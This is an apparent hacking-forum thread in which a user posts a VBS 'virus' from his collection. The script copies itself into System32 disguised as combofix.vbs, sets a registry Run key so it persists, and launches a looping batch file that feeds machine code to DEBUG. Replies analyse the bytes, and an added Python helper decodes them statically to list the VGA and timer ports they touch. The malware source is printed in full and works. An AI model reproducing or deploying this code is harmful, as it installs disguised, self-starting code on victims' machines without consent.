EvilZone
Programming and Scripting => Scripting Languages => : Kulverstukas June 21, 2011, 09:53:45 PM
-
Well, I checked my supuh seecrit virus folder where I keep those legendary viruses, for no particular reason, and found this cool VBS script, that is said to make your monitor or VGA card smoke :P I don't know how true it is or that it works (don't know VBS :( too afraid to test :P )
I got it... don't know where, probably was 1nj3ct forums, one guy posted...
' 45 4c 49 58 49 41 20 42 59 20 4f 58 59 20 4f 46 20 4e 51 52 20 54 65 41 6d 20 46 4f 52 20 4b 49 52 41 20 4f 46 20 43 59 42 45 52 20 4c 49 46 45
' xirusteam
if IsDate(#25/02#) then
Dim FSO, WriteStuff, Shell
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.Shell")
Set WriteStuff = FSO.OpenTextFile("temp.bat", 8, True)
Fso.copyfile wscript.scriptfullname, "C:\Windows\System32\combofix.vbs"
call Shell.RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\???","C:\Windows\System32\combofix.vbs", "REG_SZ")
call MsgBox("I Was Born On The 25th And I'll Die On The 25th",65,"mizory Says:")
WriteStuff.WriteLine("@echo off")
WriteStuff.WriteLine(":bomb")
WriteStuff.WriteLine("echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg")
WriteStuff.WriteLine("echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg")
WriteStuff.WriteLine("echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg")
WriteStuff.WriteLine("echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg")
WriteStuff.WriteLine("echo g=200>>\O.dbg")
WriteStuff.WriteLine("echo q>>\O.dbg""")
WriteStuff.WriteLine("debug <\O.dbg>nul")
WriteStuff.WriteLine("del \O.dbg")
WriteStuff.WriteLine("goto bomb")
WriteStuff.Close
Shell.Run("temp.bat")
End If
-
It's a program that runs on a certain date
then it outputs a msgbox
and creates a batch
and runs it but I don't know what the batch does :S
@echo off
:bomb
echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg
echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg
echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg
echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg
echo g=200>>\O.dbg
echo q>>\O.dbg""
debug <\O.dbg>nul
del \O.dbg
goto bomb
WriteStuff.Close
-
That batch uses debug to execute the following:
004012D0 B8 1300CD10 MOV EAX,10CD0013
004012D5 E4 40 IN AL,40 ; I/O command
004012D7 88C3 MOV BL,AL
004012D9 E4 40 IN AL,40 ; I/O command
004012DB 88C7 MOV BH,AL
004012DD F6E3 MUL BL
004012DF 30DF XOR BH,BL
004012E1 88C1 MOV CL,AL
004012E3 BA C80330C0 MOV EDX,C03003C8
004012E8 EE OUT DX,AL ; I/O command
004012E9 BA DA03ECA8 MOV EDX,A8EC03DA
004012EE 0875 90 OR BYTE PTR SS:[EBP-70],DH
004012F1 FB STI
004012F2 EC IN AL,DX ; I/O command
004012F3 A8 08 TEST AL,8
004012F5 ^74 FB JE SHORT test.004012F2
004012F7 BA C90388D8 MOV EDX,D88803C9
004012FC EE OUT DX,AL ; I/O command
004012FD 88F8 MOV AL,BH
004012FF EE OUT DX,AL ; I/O command
00401300 8890 90909090 MOV BYTE PTR DS:[EAX+90909090],DL
00401306 C8 EEB401 ENTER 0B4EE,1
0040130A CD 16 INT 16 ; |
0040130C ^74 CD JE SHORT test.004012DB
0040130E B8 0300CD90 MOV EAX,90CD0003
Latest versions of Windows have removed debug. Also, please, some ASM coder tell us what that code does. In my limited view, it gets info from a port in the system (in), checks values, and then puts values (out) in it. That port should be the screen, I think.
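Added example, not part of the original thread: a small static triage helper that rebuilds the bytes written by the batch file's DEBUG `e` lines and lists which I/O ports and software interrupts they touch, without running anything. It decodes the bytes as 16-bit real-mode code (the mode DEBUG executes in); the function names are made up for this example, and the length table covers only the opcodes present in this blob.

```python
import re

# The batch file's DEBUG "e" (enter bytes) and "g" (go) lines, copied from the thread.
DEBUG_SCRIPT = """\
e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30
e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75
e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88
e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3
g=200
"""

# Instruction lengths for the only opcodes this blob uses (16-bit mode,
# register-to-register ModRM forms). Assumption: not a general x86 decoder.
LENGTHS = {0xB8: 3, 0xBA: 3, 0xCD: 2, 0xE4: 2, 0xA8: 2, 0xB4: 2, 0x74: 2,
           0x75: 2, 0x88: 2, 0x30: 2, 0xF6: 2, 0xEC: 1, 0xEE: 1, 0xC3: 1}

def load_image(script):
    """Rebuild the memory image written by the DEBUG 'e' commands."""
    image = {}
    for m in re.finditer(r"^e([0-9a-f]+)((?: [0-9a-f]{2})+)", script, re.I | re.M):
        base = int(m.group(1), 16)
        for i, byte in enumerate(bytes.fromhex(m.group(2))):
            image[base + i] = byte
    return image

def entry_point(script):
    """Address given to DEBUG's 'g=' command."""
    return int(re.search(r"^g=([0-9a-f]+)", script, re.I | re.M).group(1), 16)

def io_summary(script):
    """Linear sweep from the g= address; list port I/O and software interrupts."""
    image, pc, dx, events = load_image(script), entry_point(script), None, []
    while pc in image:
        op = image[pc]
        if op not in LENGTHS:                # outside the table: stop, flag it
            events.append((pc, "unknown", op))
            break
        if op == 0xBA:                       # MOV DX, imm16 (little-endian)
            dx = image[pc + 1] | image[pc + 2] << 8
        elif op == 0xE4:                     # IN AL, imm8
            events.append((pc, "in", image[pc + 1]))
        elif op == 0xEC:                     # IN AL, DX
            events.append((pc, "in", dx))
        elif op == 0xEE:                     # OUT DX, AL
            events.append((pc, "out", dx))
        elif op == 0xCD:                     # INT imm8
            events.append((pc, "int", image[pc + 1]))
        pc += LENGTHS[op]
    return events
```

The result names ports 0x40 (PIT timer counter), 0x3DA (VGA input status) and 0x3C8/0x3C9 (VGA DAC palette index and data), with INT 10h and INT 16h as the only BIOS calls.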
-
and since the batch does this over and over, so your screen port will be overloaded?